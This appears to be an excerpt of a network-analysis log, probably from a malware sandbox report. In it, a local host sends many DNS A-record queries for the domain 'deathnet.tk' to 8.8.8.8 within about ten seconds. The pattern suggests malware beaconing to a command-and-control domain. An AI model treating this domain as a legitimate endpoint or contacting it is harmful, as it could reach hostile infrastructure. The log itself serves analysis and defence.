              Mar 21, 2022 20:08:04.033409119 CET192.168.2.238.8.8.80x6dadStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.077080965 CET192.168.2.238.8.8.80x6bfcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.120767117 CET192.168.2.238.8.8.80x5e14Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.166625977 CET192.168.2.238.8.8.80x7e46Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.212471008 CET192.168.2.238.8.8.80x5c76Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.257657051 CET192.168.2.238.8.8.80xb137Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.303821087 CET192.168.2.238.8.8.80xe0e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.348680019 CET192.168.2.238.8.8.80x1633Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.394512892 CET192.168.2.238.8.8.80xd532Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.441900969 CET192.168.2.238.8.8.80x58ceStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.488995075 CET192.168.2.238.8.8.80xdff0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.534590006 CET192.168.2.238.8.8.80xca72Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.583864927 CET192.168.2.238.8.8.80xd021Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.631834030 CET192.168.2.238.8.8.80x676cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.678800106 CET192.168.2.238.8.8.80xdf2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.726381063 CET192.168.2.238.8.8.80xaf23Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.773371935 CET192.168.2.238.8.8.80xd7bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.819879055 CET192.168.2.238.8.8.80xc6d5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.867897034 CET192.168.2.238.8.8.80x14a6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.911112070 CET192.168.2.238.8.8.80x9719Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:04.960587025 CET192.168.2.238.8.8.80x30efStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.006802082 CET192.168.2.238.8.8.80x722fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.061379910 CET192.168.2.238.8.8.80x7be2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.115561008 CET192.168.2.238.8.8.80x549cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.170882940 CET192.168.2.238.8.8.80xb62aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.215799093 CET192.168.2.238.8.8.80xe6ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.268326044 CET192.168.2.238.8.8.80x92bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.315778971 CET192.168.2.238.8.8.80xe98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.362462997 CET192.168.2.238.8.8.80x287dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.408174038 CET192.168.2.238.8.8.80x6e33Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.450937033 CET192.168.2.238.8.8.80x6242Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.495289087 CET192.168.2.238.8.8.80x34bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.539021015 CET192.168.2.238.8.8.80xcd1bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.583662033 CET192.168.2.238.8.8.80x178fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.628997087 CET192.168.2.238.8.8.80x839eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.675704956 CET192.168.2.238.8.8.80x9002Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.718337059 CET192.168.2.238.8.8.80x9aaeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.763479948 CET192.168.2.238.8.8.80x183bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.807116032 CET192.168.2.238.8.8.80x72abStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.852806091 CET192.168.2.238.8.8.80x770aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.897933006 CET192.168.2.238.8.8.80x7bbdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.947611094 CET192.168.2.238.8.8.80xee44Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:05.992604017 CET192.168.2.238.8.8.80x88e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.037542105 CET192.168.2.238.8.8.80x4c85Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.083163023 CET192.168.2.238.8.8.80xf042Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.128645897 CET192.168.2.238.8.8.80x509cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.176006079 CET192.168.2.238.8.8.80xb4e5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.223016024 CET192.168.2.238.8.8.80x1573Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.266432047 CET192.168.2.238.8.8.80xa069Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.311197996 CET192.168.2.238.8.8.80xedcbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.356266022 CET192.168.2.238.8.8.80xd2dfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.402276993 CET192.168.2.238.8.8.80xbc3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.447406054 CET192.168.2.238.8.8.80x74fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.495987892 CET192.168.2.238.8.8.80xda68Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.539520025 CET192.168.2.238.8.8.80x99eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.583048105 CET192.168.2.238.8.8.80x4566Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.628062010 CET192.168.2.238.8.8.80x2f67Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.673362970 CET192.168.2.238.8.8.80x3a52Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.720781088 CET192.168.2.238.8.8.80x57caStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.767932892 CET192.168.2.238.8.8.80xaabaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.814361095 CET192.168.2.238.8.8.80x4156Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.857713938 CET192.168.2.238.8.8.80xbe05Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.902549028 CET192.168.2.238.8.8.80xd9bdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.947684050 CET192.168.2.238.8.8.80x58e0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:06.991224051 CET192.168.2.238.8.8.80xe8d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.033711910 CET192.168.2.238.8.8.80xbb48Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.079190016 CET192.168.2.238.8.8.80x421cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.128272057 CET192.168.2.238.8.8.80xd7cdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.176227093 CET192.168.2.238.8.8.80x8f83Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.223177910 CET192.168.2.238.8.8.80xce5dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.268074036 CET192.168.2.238.8.8.80x5284Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.311039925 CET192.168.2.238.8.8.80x2b8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.360539913 CET192.168.2.238.8.8.80x961Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.405746937 CET192.168.2.238.8.8.80x8cfcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.450237036 CET192.168.2.238.8.8.80x907dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.492847919 CET192.168.2.238.8.8.80xb529Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.538084984 CET192.168.2.238.8.8.80x7b5bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.581769943 CET192.168.2.238.8.8.80x70caStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.625996113 CET192.168.2.238.8.8.80xa4f3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.679543972 CET192.168.2.238.8.8.80x86caStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.722774029 CET192.168.2.238.8.8.80x9086Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.767472029 CET192.168.2.238.8.8.80xdf7aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.810636044 CET192.168.2.238.8.8.80xe59bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.855777979 CET192.168.2.238.8.8.80xc8ccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.904164076 CET192.168.2.238.8.8.80xcd0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:07.953427076 CET192.168.2.238.8.8.80x7ccbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.005851984 CET192.168.2.238.8.8.80x6bfbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.050637960 CET192.168.2.238.8.8.80x87f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.096512079 CET192.168.2.238.8.8.80x9896Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.142090082 CET192.168.2.238.8.8.80x1c62Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.187297106 CET192.168.2.238.8.8.80x82b4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.233788013 CET192.168.2.238.8.8.80x84feStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.280033112 CET192.168.2.238.8.8.80x424fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.325728893 CET192.168.2.238.8.8.80x6307Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.374259949 CET192.168.2.238.8.8.80xb332Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.419622898 CET192.168.2.238.8.8.80xdfb5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.465190887 CET192.168.2.238.8.8.80xffbeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.510312080 CET192.168.2.238.8.8.80xf54Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.556297064 CET192.168.2.238.8.8.80xcc0dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.599309921 CET192.168.2.238.8.8.80xbb05Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.643986940 CET192.168.2.238.8.8.80x38d2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.689054966 CET192.168.2.238.8.8.80x8a15Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.734149933 CET192.168.2.238.8.8.80x7575Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.782557964 CET192.168.2.238.8.8.80xd530Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.830591917 CET192.168.2.238.8.8.80x19aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.878829002 CET192.168.2.238.8.8.80xc012Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.925651073 CET192.168.2.238.8.8.80x980Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:08.971148014 CET192.168.2.238.8.8.80x7906Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.015955925 CET192.168.2.238.8.8.80x8dc0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.060281992 CET192.168.2.238.8.8.80xb4e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.103740931 CET192.168.2.238.8.8.80x8a73Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.147398949 CET192.168.2.238.8.8.80x50f1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.190470934 CET192.168.2.238.8.8.80xdf30Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.238387108 CET192.168.2.238.8.8.80xa742Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.282716990 CET192.168.2.238.8.8.80x4ef3Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.327776909 CET192.168.2.238.8.8.80x36d4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.373547077 CET192.168.2.238.8.8.80xac93Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.418205976 CET192.168.2.238.8.8.80x9123Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.462409019 CET192.168.2.238.8.8.80x8587Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.509279966 CET192.168.2.238.8.8.80x74e9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.556262016 CET192.168.2.238.8.8.80x9bcfStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.605253935 CET192.168.2.238.8.8.80x112eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.653265953 CET192.168.2.238.8.8.80x3462Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.697458982 CET192.168.2.238.8.8.80xad99Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.744348049 CET192.168.2.238.8.8.80x7b2dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.788594007 CET192.168.2.238.8.8.80xe373Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.833971024 CET192.168.2.238.8.8.80x62d9Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.879895926 CET192.168.2.238.8.8.80xdc17Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.923129082 CET192.168.2.238.8.8.80x7c82Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:09.968519926 CET192.168.2.238.8.8.80x4d09Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.013125896 CET192.168.2.238.8.8.80x1247Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.057728052 CET192.168.2.238.8.8.80x1499Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.102339029 CET192.168.2.238.8.8.80xcabbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.150917053 CET192.168.2.238.8.8.80x2724Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.199038982 CET192.168.2.238.8.8.80xf347Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:10.244178057 CET192.168.2.238.8.8.80x7abdStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.294588089 CET192.168.2.238.8.8.80xc4d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.339838982 CET192.168.2.238.8.8.80x66caStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.383408070 CET192.168.2.238.8.8.80xe881Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.427450895 CET192.168.2.238.8.8.80xb779Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.471160889 CET192.168.2.238.8.8.80xfadcStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.516324997 CET192.168.2.238.8.8.80x3163Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.563783884 CET192.168.2.238.8.8.80x822fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.607969999 CET192.168.2.238.8.8.80x2a2bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.655761957 CET192.168.2.238.8.8.80x239Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.699539900 CET192.168.2.238.8.8.80x7f8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.742578030 CET192.168.2.238.8.8.80x6975Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.785929918 CET192.168.2.238.8.8.80xe715Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.831922054 CET192.168.2.238.8.8.80x6718Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.878803015 CET192.168.2.238.8.8.80x82d7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.925323963 CET192.168.2.238.8.8.80x242Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:11.972213984 CET192.168.2.238.8.8.80x1802Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.016052008 CET192.168.2.238.8.8.80xc250Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.061499119 CET192.168.2.238.8.8.80xf7e6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.106038094 CET192.168.2.238.8.8.80x94b0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.154344082 CET192.168.2.238.8.8.80x7d5dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.199497938 CET192.168.2.238.8.8.80xe0ecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.244520903 CET192.168.2.238.8.8.80x6fbeStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.287105083 CET192.168.2.238.8.8.80xa4deStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.330751896 CET192.168.2.238.8.8.80x39c2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.373856068 CET192.168.2.238.8.8.80x915cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.422513962 CET192.168.2.238.8.8.80x525Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.470201015 CET192.168.2.238.8.8.80x2049Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.515693903 CET192.168.2.238.8.8.80xa2ccStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.561094046 CET192.168.2.238.8.8.80x12f6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.604557991 CET192.168.2.238.8.8.80xbf9cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.650147915 CET192.168.2.238.8.8.80x6fdaStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.695199013 CET192.168.2.238.8.8.80x165eStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.740015030 CET192.168.2.238.8.8.80x603dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.786061049 CET192.168.2.238.8.8.80x6d98Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.835706949 CET192.168.2.238.8.8.80x9bb2Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.884108067 CET192.168.2.238.8.8.80xa41aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.928895950 CET192.168.2.238.8.8.80x7150Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:12.973970890 CET192.168.2.238.8.8.80x8255Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.020606995 CET192.168.2.238.8.8.80xb5d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.065754890 CET192.168.2.238.8.8.80x1fa1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.111079931 CET192.168.2.238.8.8.80x8a2cStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.155699015 CET192.168.2.238.8.8.80xdbd4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.200251102 CET192.168.2.238.8.8.80x8630Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.249553919 CET192.168.2.238.8.8.80xf61bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.293711901 CET192.168.2.238.8.8.80xa563Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.339109898 CET192.168.2.238.8.8.80xb285Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.381753922 CET192.168.2.238.8.8.80x88c8Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.426388979 CET192.168.2.238.8.8.80xb696Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.469053984 CET192.168.2.238.8.8.80xb71bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.512656927 CET192.168.2.238.8.8.80x4d5bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.557096004 CET192.168.2.238.8.8.80xbddbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.601538897 CET192.168.2.238.8.8.80xeabbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.645368099 CET192.168.2.238.8.8.80xa257Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.690948009 CET192.168.2.238.8.8.80xdc9dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.735477924 CET192.168.2.238.8.8.80xac03Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.780725002 CET192.168.2.238.8.8.80xb39aStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.825244904 CET192.168.2.238.8.8.80x42fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.867964029 CET192.168.2.238.8.8.80x6bf1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.911617041 CET192.168.2.238.8.8.80xc71Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:13.957029104 CET192.168.2.238.8.8.80x3be4Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.001825094 CET192.168.2.238.8.8.80x976fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.046381950 CET192.168.2.238.8.8.80xd270Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.091782093 CET192.168.2.238.8.8.80x9044Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.136869907 CET192.168.2.238.8.8.80xfd4bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.182445049 CET192.168.2.238.8.8.80xb184Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.227504969 CET192.168.2.238.8.8.80x1d0Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.270198107 CET192.168.2.238.8.8.80x54cbStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.315980911 CET192.168.2.238.8.8.80x3d03Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.361089945 CET192.168.2.238.8.8.80x2fe1Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.405908108 CET192.168.2.238.8.8.80xd435Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.451319933 CET192.168.2.238.8.8.80xe8f5Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.493756056 CET192.168.2.238.8.8.80x3a7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.540715933 CET192.168.2.238.8.8.80x11f7Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.585247993 CET192.168.2.238.8.8.80xe84fStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.628258944 CET192.168.2.238.8.8.80xa88dStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.671705008 CET192.168.2.238.8.8.80x11adStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.716555119 CET192.168.2.238.8.8.80x8aecStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.762200117 CET192.168.2.238.8.8.80x48d6Standard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.805490017 CET192.168.2.238.8.8.80xadffStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.850519896 CET192.168.2.238.8.8.80x3f0bStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.900304079 CET192.168.2.238.8.8.80x66ebStandard query (0)deathnet.tkA (IP address)IN (0x0001)
              Mar 21, 2022 20:08:14.946190119 CET192.168.2.238.8.8.80xb141Standard query (0)deathnet.tkA (IP address)IN (0x0001)
